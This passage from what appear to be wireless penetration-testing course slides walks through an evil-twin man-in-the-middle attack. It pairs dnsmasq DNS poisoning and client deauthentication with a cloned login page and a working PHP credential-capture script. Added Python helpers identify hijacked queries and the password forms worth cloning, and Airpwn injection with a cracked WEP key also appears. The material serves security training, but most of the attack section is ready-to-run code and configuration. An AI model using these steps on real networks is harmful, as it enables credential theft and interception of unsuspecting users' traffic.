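Mar  3 10:15:07 mitm dnsmasq[2210]: query[A] login.intranet from 192.168.10.50
Mar  3 10:15:07 mitm dnsmasq[2210]: config login.intranet is 192.168.10.1
Mar  3 10:15:09 mitm dnsmasq[2210]: query[A] www.example.com from 192.168.10.50
Mar  3 10:15:09 mitm dnsmasq[2210]: forwarded www.example.com to 192.168.1.1
Mar  3 10:15:09 mitm dnsmasq[2210]: reply www.example.com is 93.184.216.34
Mar  3 10:15:12 mitm sshd[411]: Accepted publickey for root from 192.168.1.5
"""

# DHCPxxx(iface) [ip] mac [hostname]  -- ip/hostname are absent on DISCOVER
DHCP_RE = re.compile(
    r"dnsmasq-dhcp\[\d+\]: (DHCP\w+)\((\w+)\)"
    r"(?: (\d+\.\d+\.\d+\.\d+))? ([0-9a-fA-F:]{17})(?: (\S+))?")
QUERY_RE = re.compile(r"dnsmasq\[\d+\]: query\[(\w+)\] (\S+) from (\d+\.\d+\.\d+\.\d+)")
# 'config' = answered from an address=/.../ line, 'reply' = from upstream
ANSWER_RE = re.compile(r"dnsmasq\[\d+\]: (config|reply|cached) (\S+) is (\S+)")


def parse_dhcp(log: str):
    """Return {mac: {'ip', 'host', 'iface'}} for leases the client accepted."""
    leases = {}
    for line in log.splitlines():
        m = DHCP_RE.search(line)
        if not m:
            continue
        msg, iface, ip, mac, host = m.groups()
        if msg == "DHCPACK":        # only the ACK means the lease is in use
            leases[mac.lower()] = {"ip": ip, "host": host, "iface": iface}
    return leases


def parse_dns(log: str):
    """Return (client_ip, qtype, name, source, answer) tuples, pairing each
    query with the answer line dnsmasq logs for it."""
    events = []
    pending = {}                    # name -> (client, qtype) awaiting answer
    for line in log.splitlines():
        q = QUERY_RE.search(line)
        if q:
            qtype, name, client = q.groups()
            pending[name] = (client, qtype)
            continue
        a = ANSWER_RE.search(line)
        if a:
            source, name, answer = a.groups()
            client, qtype = pending.pop(name, (None, None))
            events.append((client, qtype, name, source, answer))
    return events


def poisoned_queries(log: str):
    """Names resolved from local config instead of the real resolver."""
    return sorted({e[2] for e in parse_dns(log) if e[3] == "config"})


if __name__ == "__main__":
    for mac, lease in parse_dhcp(SAMPLE_LOG).items():
        print("lease", mac, lease)
    for ev in parse_dns(SAMPLE_LOG):
        print("dns", ev)
    print("poisoned:", poisoned_queries(SAMPLE_LOG))
```

Feed it the real file with open("/var/log/messages").read() on the attack laptop; the 'config' answers are the queries your address entries hijacked, and the DHCPACK lines tell you which client MAC now uses your access point as its gateway.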

Page 137: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

/etc/dnsmasq.conf


Page 138: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Viewing DHCP Requests from a Dnsmasq Log File

Page 139: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Viewing DNS Queries from a Dnsmasq Log File

Page 140: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Airpwn

Airpwn is a tool for 802.11 (wireless) packet injection.

It listens to wireless traffic for frames that match a configured pattern (for example, an HTTP request) and injects a spoofed reply that appears to come from the real server.

Because Airpwn sits on the local wireless segment while the real server is several hops away, its forged response almost always reaches the client before the legitimate one.

The client accepts the first response it receives and discards the later, genuine reply from the server, so Airpwn effectively controls the server side of the conversation without touching the access point.

Page 141: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Configuration Files

Airpwn configuration files are simple text files with one or more request/response blocks.

Request/response blocks start with the begin command followed by:

• A match expression.
• An optional ignore expression.
• A response filename.

A single configuration file is passed to Airpwn on the command line, together with its other command-line parameters, when it starts.

A configuration file can contain as many of these blocks as needed, and each block must follow this format.

Page 142: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Using Airpwn on WEP-Encrypted Networks

Airpwn can decode WEP traffic and send a WEP-encrypted response.

Use Airpwn against a WEP-protected network by passing the network's key on the Airpwn command line with the -k keystring option.

Airpwn can work on several networks at once, so the -k option may be given more than once to supply multiple keys.

keystring is the WEP key itself; for the VisitorLAN network this is the key recovered with aircrack-ng.

Page 143: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Airpwn: Scripting

Airpwn can be configured to return dynamic response data from a Python script in place of a static response file.

To use a script, put pyscript pythonmodule in the request/response block in place of the response line.

The module must define an airpwn_response function that takes one argument, the matched request.

airpwn_response returns the response data to inject, or None if no response should be sent.

Page 144: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Apache Hypertext Preprocessor and Virtual Web Servers

Apache is a versatile and configurable web server that provides the ability to host spoofed web applications on the MITM attack laptop.

During the MITM attack, you will need to create a spoofed login page using Apache and PHP to capture user credentials.

Start Apache with the following command:

• /etc/init.d/apache2 start

During the MITM attack, you spoof a web page and host it on your attack platform.

In a real scenario, you might want to set up multiple websites to increase the chance of capturing user credentials.

Page 145: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Virtual Directories

To host multiple sites on your web server, you can define virtual hosts in the /etc/apache2/vhosts.d/00_default_vhost.conf file.

You can define multiple virtual hosts in the 00_default_vhost.conf file, one per IP address, using the following configuration:

<VirtualHost 192.168.10.2:80>
DocumentRoot "/var/www/localhost/htdocs/site1/"
</VirtualHost>

<VirtualHost 192.168.10.3:80>
DocumentRoot "/var/www/localhost/htdocs/site2/"
</VirtualHost>

<VirtualHost 192.168.10.4:80>
DocumentRoot "/var/www/localhost/htdocs/site3/"
</VirtualHost>

Page 146: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Virtual Directories (cont’d)

In the previous slide, each virtual host has a separate IP address defined for each site.

In order for this to work properly, you need to define virtual interfaces for each IP address using the following commands:

ifconfig wlan1:0 192.168.10.2 netmask 255.255.255.0

ifconfig wlan1:1 192.168.10.3 netmask 255.255.255.0

ifconfig wlan1:2 192.168.10.4 netmask 255.255.255.0

Page 147: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Clone the Target Access Point and Begin the Attack

Once you are finished with the configuration of your MITM attack laptop, you can establish your wireless connections and begin the attack.

Page 148: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Start the Wireless Interface

After you are done configuring the wireless files, you can start the wireless interfaces and establish your wireless network connections.

Establish the connection to your target wireless network using the command:

• /etc/init.d/net.wlan0 start

Next, start your other wireless interface (wlan1) using the command:

• /etc/init.d/net.wlan1 start

Page 149: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Start the Wireless Interfaces (cont’d)

Page 150: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Deauthenticate Clients Connected to the Target Access Point

To get the victim wireless clients to connect to your access point, you can wait until they disconnect and reconnect, or you can force them to reconnect.

To force the clients off the target wireless network, you can deauthenticate them from the target access point using another computer (aireplay-ng can send the deauthentication frames); when they reconnect, they should pick the stronger signal, which is yours.

Page 151: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wait for the Client to Associate to Your Access Point

If all goes well and the signal strength of your access point is stronger than that of the target network's access point, you should see the wireless client connect to your access point.

When a wireless client associates to your access point, you need to assign it an IP address.

Dnsmasq will provide an IP address to the client using the DHCP allocations defined in the /etc/dnsmasq.conf file.

The client will use the IP address of your access point as its gateway and primary DNS server.

Page 152: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Spoof the Application

The goal of the spoofed application is to have the user log in to your web page instead of the real (authorized) one.

This won't be difficult if the site is not using SSL and is using form-based authentication.

A quick and easy way to spoof the site is to download the target web page using wget and modify the source:

wget -r http://192.168.1.30

Once you have all the files associated with the web page, you need to modify the source HTML and add some extra code to capture the username and password form variables.

Page 153: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Modify the Page

When you edit the index.html file using your favorite text editor, keep the page looking exactly the same to the user; the only change you need is that the login form submits to your own backend script.

Page 154: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Example Page

<html><body>
<h1>Intranet Login</h1>
<form action='login.php' method="post">
<table border=0>
<tr><td>Username:</td><td><input type=text name="username" size=30></td></tr>
<tr><td>Password:</td><td><input type="password" name="password" size=30></td></tr>
</table>
<input type="submit" value="Submit">
</form>
</body></html>

Page 155: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Example Page (cont’d)

Now that you know the names of the form variables, the method, and the action, you can create your own backend login.php page.

Using a simple PHP page, capture the user credentials and redirect the client back to the original source of the web page.
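Added example, not from the module: a small Python parser that extracts each form's action, method and named inputs from the downloaded page, so the spoofed copy and its backend script are built from the real field names rather than read off by eye, and only forms that actually carry a password field are reported. The base URL is the address the module fetched with wget; the sample HTML is a constructed copy of the example page.

```python
"""Extract login forms (action, method, input names) from a page fetched
with wget.  Added example, not from the ECSA module; SAMPLE_PAGE is a
constructed copy of the module's example page."""
from html.parser import HTMLParser
from urllib.parse import urljoin

SAMPLE_PAGE = """\
<html><body>
<h1>Intranet Login</h1>
<form action='login.php' method="post">
<table border=0>
<tr><td>Username:</td><td><input type=text name="username" size=30></td></tr>
<tr><td>Password:</td><td><input type="password" name="password" size=30></td></tr>
</table>
<input type="submit" value="Submit">
</form>
</body></html>
"""


class FormExtractor(HTMLParser):
    """Collect every <form> with its resolved submit target and named inputs."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                      # attribute values may be None
        if tag == "form":
            self._current = {
                # relative actions resolve against the page we downloaded
                "action": urljoin(self.base_url, a.get("action") or ""),
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
                "has_password": False,
            }
        elif tag in ("input", "textarea", "select") and self._current is not None:
            itype = (a.get("type") or "text").lower()
            if itype == "password":
                self._current["has_password"] = True
            # submit buttons carry no credential, so they are not recorded
            if a.get("name") and itype not in ("submit", "button", "image"):
                self._current["inputs"].append((a["name"], itype))

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def extract_forms(html: str, base_url: str):
    """All forms on the page, in document order."""
    p = FormExtractor(base_url)
    p.feed(html)
    p.close()
    return p.forms


def login_forms(html: str, base_url: str):
    """Only forms with a password field are worth cloning."""
    return [f for f in extract_forms(html, base_url) if f["has_password"]]


if __name__ == "__main__":
    for f in login_forms(SAMPLE_PAGE, "http://192.168.1.30/"):
        print(f["method"].upper(), f["action"])
        for name, itype in f["inputs"]:
            print("  $_POST['%s']  (%s)" % (name, itype))
```

Run it over the index.html that wget saved (open(path).read()) and the printed $_POST names are exactly the keys the backend page has to read; a site whose form posts to an absolute https:// URL shows up here immediately, which is the case the module's plain-HTTP approach does not cover.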

Page 156: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

login.php page

<?php
// Read the two fields posted by the spoofed form.
$username = $_POST['username'];
$password = $_POST['password'];

// Append the captured credentials to a log file the web server can write to.
$log = '/var/log/apache2/captured.txt';
$user_info = "Username:$username Password:$password\n";
$fp = fopen($log, "a");
fwrite($fp, $user_info);
fclose($fp);

// Send the client on to the real site so the login appears to have worked.
$URL = "http://192.168.1.30";
header("Location: $URL");
?>

Page 157: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Redirect Web Traffic Using Dnsmasq

Once your fake login page is functional, you can poison the client's DNS traffic to redirect any queries for the target's host name to your malicious login page.

To do this, modify the address variable of your Dnsmasq configuration file to add the DNS name of your target and the IP address of your web server:

• address=/login.intranet/192.168.10.1

Once you update the address variable, you have to restart the Dnsmasq service to enable the change:

• /etc/init.d/dnsmasq restart

At this point, if a client connected to your access point makes a request for the login.intranet web page, the name will resolve to your web server, which is hosting the spoofed login page. Only names listed in address entries are answered locally; everything else is still forwarded to the real resolver, so the client's other traffic keeps working and nothing looks broken.
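Before restarting Dnsmasq it is worth checking exactly which names an address entry will capture. The following Python model, added here and not part of the module or of Dnsmasq, reproduces the matching rule Dnsmasq applies to address=/domain/ip lines (the domain itself and every name beneath it, most specific entry first) and flags entries on a bare suffix that would redirect far more than the login host. The configuration fragment and the queried names are constructed.

```python
"""Model of how dnsmasq's address=/domain/ip directive answers queries.
Added example (not from the ECSA module or dnsmasq); SAMPLE_CONF is a
constructed /etc/dnsmasq.conf fragment."""

SAMPLE_CONF = """\
# constructed /etc/dnsmasq.conf fragment
interface=wlan1
dhcp-range=192.168.10.50,192.168.10.150,12h
address=/login.intranet/192.168.10.1
address=/mail.intranet/192.168.10.2
address=/corp.example.com/192.168.10.3
"""


def parse_address_lines(conf: str):
    """Return {domain: ip} from every address=/domain/ip directive."""
    table = {}
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line.startswith("address="):
            continue
        parts = line[len("address="):].strip("/").split("/")
        if len(parts) == 2:                      # address=/domain/ (no ip) is NXDOMAIN; skipped here
            table[parts[0].lower().rstrip(".")] = parts[1]
    return table


def resolve(name: str, table: dict):
    """dnsmasq semantics: a query is answered by the entry for its own name
    or its closest ancestor; unmatched names go upstream (returned as None)."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):                 # longest suffix first
        candidate = ".".join(labels[i:])
        if candidate in table:
            return table[candidate]
    return None


def hijacked(names, conf: str):
    """Which of the names would be answered locally, and with what address."""
    table = parse_address_lines(conf)
    out = {}
    for n in names:
        ip = resolve(n, table)
        if ip is not None:
            out[n] = ip
    return out


def overbroad_entries(conf: str):
    """Entries on a bare suffix such as address=/intranet/...: they redirect
    every name under that suffix, which breaks unrelated services and is
    easy for the victim to notice."""
    return [d for d in parse_address_lines(conf) if "." not in d]


if __name__ == "__main__":
    seen = ["login.intranet", "sso.login.intranet", "www.example.com",
            "vpn.corp.example.com", "intranet"]
    print(hijacked(seen, SAMPLE_CONF))
    print("over-broad:", overbroad_entries(SAMPLE_CONF))
```

Note that sso.login.intranet is captured as well as login.intranet, and that the bare name intranet is not; if the target's application lives on a sub-name, the entry still works, but anything else under the same label is silently redirected to your web server too.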

Page 158: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Summary

In this module, we reviewed advanced techniques for wireless penetration testing.

We have discussed various wireless concepts such as its components and standards.

We have reviewed Wired Equivalent Privacy (WEP), its issues, flaws, and security.

We have discussed various wireless security technologies such as WPA, EAP, and TKIP.

We have discussed different attacks and tools such as WarDriving, NetStumbler, and MITM attacks.
